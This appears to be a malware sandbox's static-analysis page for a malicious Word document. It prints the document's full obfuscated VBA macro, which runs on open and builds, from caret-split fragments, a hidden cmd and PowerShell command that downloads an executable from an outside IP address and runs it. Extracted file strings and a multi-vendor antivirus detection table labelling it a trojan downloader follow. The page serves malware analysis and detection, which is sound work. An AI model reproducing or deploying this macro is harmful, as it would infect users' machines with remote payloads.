Static | ZeroBOX

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True

Attribute VB_Name = "tmpF572" Sub kfekaxw() Dim oniwkexa, fujuxycg7, ikiwu, juvzoht0, qhegmero8, oklokq0, ofezr0, wobuhu0, mcuqpedzavs1, lyhwefzolf, ymybmefu9, hwuhtobe, ujictuqy, urudyglu, anenfy, fyphij1, qempepwo, gmeko, byhlipqyc, ujeh, yrpobakdi, rehgibm, zcizuhop9, zybape0, dgibekxef6, uzejyfd, opogd, afytlepd9, ehhigy, oqjofl, thybadxewc9, ykbiny, pgopikka9, yftixgad2, uqjezvi, wjehoqa, abdigmojp0, yhun, orcer, ejelne, blapkehick Dim jhuvyjotg3, efowyvi, ichasqy9, sosuwcok4 qhegmero8 = "e /C """ wjehoqa = "^LOAD^" foqywk = VarType(ActiveDocument.Envelope.DefaultSize) = 8 oniwkexa = "-wIn^d" blapkehick = "^Et.^W" opogd = "p^RoCE" pgopikka9 = "pPdaTA" anenfy = "ss '%A" afytlepd9 = "^.e^Xe" wobuhu0 = "^en " uqjezvi = "rshelL" uzejyfd = " SY^" fyphij1 = "e','%a" efowyvi = "TaR^t-" yhun = "^C^T " ujeh = "^('htt" byhlipqyc = " (N^e" juvzoht0 = "wpc.ex" hwuhtobe = "w-ObJE" oqjofl = "CMD.ex" abdigmojp0 = ").DoWn" yrpobakdi = ")^;^S^" ujictuqy = ".102/d" yftixgad2 = "cutIO^" ymybmefu9 = "^YP^aS" ofezr0 = "^CY b" gmeko = "yL^e^ " oklokq0 = "^no^Pr" qempepwo = "Np^OLI" dgibekxef6 = "O^W^st" ichasqy9 = "pPdata" fujuxycg7 = "%.exE'" rehgibm = "p://84" thybadxewc9 = """" ehhigy = "^IeNt^" ykbiny = "^OF^il" zybape0 = "f^i^LE" sosuwcok4 = "STEm.N" urudyglu = "%.eXE'" orcer = vbHide awwezx0 = "^EBC^L" jhuvyjotg3 = "E " ikiwu = "s -" ejelne = " HId^D" zcizuhop9 = ".200.4" mcuqpedzavs1 = "p^ow^E" lyhwefzolf = " -^ExE" If foqywk Then Shell Join(Array(oqjofl, qhegmero8, mcuqpedzavs1, uqjezvi, afytlepd9, lyhwefzolf, yftixgad2, qempepwo, ofezr0, ymybmefu9, ikiwu, oklokq0, ykbiny, jhuvyjotg3, oniwkexa, dgibekxef6, gmeko, ejelne, wobuhu0, byhlipqyc, hwuhtobe, yhun, uzejyfd, sosuwcok4, blapkehick, awwezx0, ehhigy, abdigmojp0, wjehoqa, zybape0, ujeh, rehgibm, zcizuhop9, ujictuqy, juvzoht0, fyphij1, pgopikka9, fujuxycg7, yrpobakdi, efowyvi, opogd, anenfy, ichasqy9, urudyglu, thybadxewc9), ""), orcer End If End Sub Sub AutoOpen() kfekaxw End Sub

bjbj,E,E

[Content_Types].xml

_rels/.rels

theme/theme/themeManager.xml

theme/theme/theme1.xml

w toc'v

3Vq%'#q

:\TZaG

Qg20pp

theme/theme/_rels/themeManager.xml.rels

K(M&$R(.1

[Content_Types].xmlPK

_rels/.relsPK

theme/theme/themeManager.xmlPK

theme/theme/theme1.xmlPK

theme/theme/_rels/themeManager.xml.relsPK

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>

Windows User

Normal

Windows User

Microsoft Office Word

Attribut

e VB_Nam

e = "Thi

sDocumen

1Normal

VGlobal!

Pre decla

lateDeri

$Custom

Win64x

Project1

stdole

Project-

ThisDocument<

_Evaluate

Normal

Office

Module1b

tmpF572

kfekaxw

oniwkexa

fujuxycg7

juvzoht0

qhegmero8

oklokq0

ofezr07

wobuhu0

mcuqpedzavs1[F

lyhwefzolfH.

ymybmefu9\Y

hwuhtobe

ujictuqy

urudyglu

anenfy+

fyphij1

qempepwo,v

byhlipqycA

yrpobakdi

rehgibm

zcizuhop9

zybape03?

dgibekxef6

uzejyfdY=

afytlepd9

ehhigy

oqjoflm

thybadxewc9z

ykbiny

pgopikka9?C

yftixgad2

uqjezvis

wjehoqa

abdigmojp0

ejelne

blapkehickN-

jhuvyjotg3

efowyvi

ichasqy9p

sosuwcok4

foqywka

VarType

ActiveDocument

Envelope

DefaultSize

vbHide

awwezx0

ShellV

JoinM&

AutoOpen

Documentj

.200.4'

p^ow^E'

Project

\G{00020

0046}#

2.0#0#C:

\Windows

\SysWOW6

e2.tlb

#OLE Aut

omation

ENormal

!Offic

!G{2DF

8D04C-5B

FA-101B-

m Files

(x86)\Co

crosoft

Shared\O

FFICE14\

MSO.DLL#

P 14.0

LibrXary

hisDocum@entG

tmpF57P2G

e /C "'

^LOAD^'

-wIn^d'

^Et.^W'

p^RoCE'

pPdaTA'

ss '%A'

^.e^Xe'

^en '

rshelL'

SY^'

e','%a'

TaR^t-'

^C^T '

^('htt'

(N^e'

wpc.ex'

w-ObJE'

CMD.ex'

).DoWn'

)^;^S^'

.102/d'

cutIO^'

^YP^aS'

^CY b'

yL^e^ '

^no^Pr'

Np^OLI'

O^W^st'

pPdata'

%.exE''

p://84'

rt thi

^IeNt^'

^OF^il'

f^i^LE'

STEm.N'

%.eXE''

^EBC^L'

E '

s -'

HId^D'

.200.4'

p^ow^E'

-^ExE'

Attribut

e VB_Nam

e = "tmp

ub kfeka

m oniwke

xa, fuju

xycg7, i

kiwu, ju

vzoht0,

qhegmero

8, oklok

&ofezr

@wobuhu

cuqpedza

vs1, lyh

wefzolf,

ymybmef

u9, hwuh

tobe, uj@ictuqy

r udygl

Eqempe

byhlipqy$c,

obakdi,

rehgibm,

zcizuho

7zybape

zejyfd

afy tlepd

@oqjo@fl, th

Cwjeho

abdigm

8rcer, e

pkehick

jhuvyjot

ichasqy

sosuwcok

e /pC ""

^ LOAD^

Type(Act

iveDocum

ent.Enve

lope.Def

aultSizeb)

-wIn^d

^Et.^W

en 4

e',h'%a

(p'htt@

p (N^

).DhoWn

^8;^SA2

.1h02/

cputIO

CY b@

Np^OLI

%9`E'

OF^il

f^i^LA.

STEm.N

vbHide

awwezx0

yThen`

l Join(A

rray(%

oOpen!

ThisDocument

tmpF572

ID="{EA5F7498-1939-4F60-BEF2-14FFB3AB5367}"

Document=ThisDocument/&H00000000

Module=tmpF572

Name="Project"

HelpContextID="0"

VersionCompatible32="393222000"

CMG="87857B498BD957DD57DD57DD57DD"

DPB="4F4DB381B3817A827A827A"

GC="1715EBD97B69426A426ABD"

[Host Extender Info]

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

[Workspace]

ThisDocument=0, 0, 0,P

tmpF572=52, 52, 1400, 707,

Microsoft Word 97-2003 Document

MSWordDoc

Word.Document.8

Normal

Default Paragraph Font

Table Normal

No List

Project.tmpF572.kfekaxw

Project.tmpF572.AutoOpen

PROJECT.TMPF572.KFEKAXW

PROJECT.TMPF572.AUTOOPEN

Unknown

Times New Roman

Symbol

Calibri

Cambria Math

Windows User

Root Entry

1Table

WordDocument

SummaryInformation

DocumentSummaryInformation

Macros

ThisDocument

(1Normal.ThisDocument

*\G{000204EF-0tmpF572

_VBA_PROJECT

PROJECTwm

000-0000-C000-000000000046}#4.1#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7.DLL#Visual Basic For Applications

*\G{00020905-0000-0000-C000-000000000046}#8.5#0#C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB#Microsoft Word 14.0 Object Library

*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation

*\CNormal

*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.5#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL#Microsoft Office 14.0 Object Library

ThisDocument

0_5a202199

ThisDocument

tmpF572

0`5a202199

tmpF572

tThisDocument

2tmpF572

PROJECT

CompObj

Antivirus	Signature
Bkav	Clean
MicroWorld-eScan	Trojan.GenericKD.4032157
FireEye	VBA:Amphitryon.3374
CAT-QuickHeal	Ole.Trojan-Downloader.A1386295
McAfee	W97M/Downloader.bsd
Malwarebytes	Clean
Zillya	Clean
AegisLab	Clean
Sangfor	Malware.Generic-Macro.Save.9378bd11
K7AntiVirus	Clean
K7GW	Clean
Baidu	VBA.Trojan-Downloader.Agent.bai
Cyren	W97M/Agent.gen
Symantec	W97M.Downloader
ESET-NOD32	VBA/TrojanDownloader.Agent.CEW
TrendMicro-HouseCall	Trojan.W97M.POWLOAD.THABAAAH
Avast	VBA:Downloader-DUW [Trj]
ClamAV	Doc.Dropper.Downloader-6398265-0
Kaspersky	Trojan-Downloader.MSWord.Agent.axd
BitDefender	VBA:Amphitryon.3374
NANO-Antivirus	Trojan.Script.vbPShell.ejvnov
ViRobot	Clean
Tencent	Heur.Msword.Gen.c
Ad-Aware	Trojan.GenericKD.4032157
Sophos	Troj/DocDl-GFB
Comodo	Malware@#1rjt6798z25ka
F-Secure	Clean
DrWeb	Exploit.Siggen.17643
VIPRE	Clean
TrendMicro	Trojan.W97M.POWLOAD.THABAAAH
McAfee-GW-Edition	BehavesLike.OLE2.Downloader.nx
CMC	Clean
Emsisoft	Trojan-Downloader.Macro (A)
SentinelOne	Static AI - Malicious OLE
GData	Trojan.GenericKD.4032157
Jiangmin	Clean
Avira	HEUR/Macro.Agent
MAX	malware (ai score=100)
Antiy-AVL	Clean
Kingsoft	Clean
Gridinsoft	Trojan.U.Downloader.oa
Arcabit	Clean
SUPERAntiSpyware	Clean
ZoneAlarm	Clean
Microsoft	Trojan:O97M/Vigorf.A
Cynet	Malicious (score: 99)
AhnLab-V3	Clean
Acronis	Clean
BitDefenderTheta	Clean
ALYac	Trojan.GenericKD.4032157
TACHYON	Suspicious/W97M.Obfus.Gen.6
VBA32	Clean
Zoner	Probably Heur.W97Obfuscated
Rising	Downloader.Agent!8.B23 (TOPIS:E0:Z3yHNPAq86P)
Yandex	Clean
Ikarus	Trojan-Downloader.Script
MaxSecure	Clean
Fortinet	WM/Agent.CIJ!tr
AVG	VBA:Downloader-DUW [Trj]
Panda	Clean
Qihoo-360	Clean

Antivirus

Signature

Bkav

Clean

MicroWorld-eScan

Trojan.GenericKD.4032157

FireEye

VBA:Amphitryon.3374

CAT-QuickHeal

Ole.Trojan-Downloader.A1386295

McAfee

W97M/Downloader.bsd

Malwarebytes

Clean

Zillya

Clean

AegisLab

Clean

Sangfor

Malware.Generic-Macro.Save.9378bd11

K7AntiVirus

Clean

K7GW

Clean

Baidu

VBA.Trojan-Downloader.Agent.bai

Cyren

W97M/Agent.gen

Symantec

W97M.Downloader

ESET-NOD32

VBA/TrojanDownloader.Agent.CEW

TrendMicro-HouseCall

Trojan.W97M.POWLOAD.THABAAAH

Avast

VBA:Downloader-DUW [Trj]

ClamAV

Doc.Dropper.Downloader-6398265-0

Kaspersky

Trojan-Downloader.MSWord.Agent.axd

BitDefender

VBA:Amphitryon.3374

NANO-Antivirus

Trojan.Script.vbPShell.ejvnov

ViRobot

Clean

Tencent

Heur.Msword.Gen.c

Ad-Aware

Trojan.GenericKD.4032157

Sophos

Troj/DocDl-GFB

Comodo

Malware@#1rjt6798z25ka

F-Secure

Clean

DrWeb

Exploit.Siggen.17643

VIPRE

Clean

TrendMicro

Trojan.W97M.POWLOAD.THABAAAH

McAfee-GW-Edition

BehavesLike.OLE2.Downloader.nx

CMC

Clean

Emsisoft

Trojan-Downloader.Macro (A)

SentinelOne

Static AI - Malicious OLE

GData

Trojan.GenericKD.4032157

Jiangmin

Clean

Avira

HEUR/Macro.Agent

MAX

malware (ai score=100)

Antiy-AVL

Clean

Kingsoft

Clean

Gridinsoft

Trojan.U.Downloader.oa

Arcabit

Clean

SUPERAntiSpyware

Clean

ZoneAlarm

Clean

Microsoft

Trojan:O97M/Vigorf.A

Cynet

Malicious (score: 99)

AhnLab-V3

Clean

Acronis

Clean

BitDefenderTheta

Clean

ALYac

Trojan.GenericKD.4032157

TACHYON

Suspicious/W97M.Obfus.Gen.6

VBA32

Clean

Zoner

Probably Heur.W97Obfuscated

Rising

Downloader.Agent!8.B23 (TOPIS:E0:Z3yHNPAq86P)

Yandex

Clean

Ikarus

Trojan-Downloader.Script

MaxSecure

Clean

Fortinet

WM/Agent.CIJ!tr

AVG

VBA:Downloader-DUW [Trj]

Panda

Clean

Qihoo-360

Clean

Static Analysis

Original

Deobfuscated

Original

Deobfuscated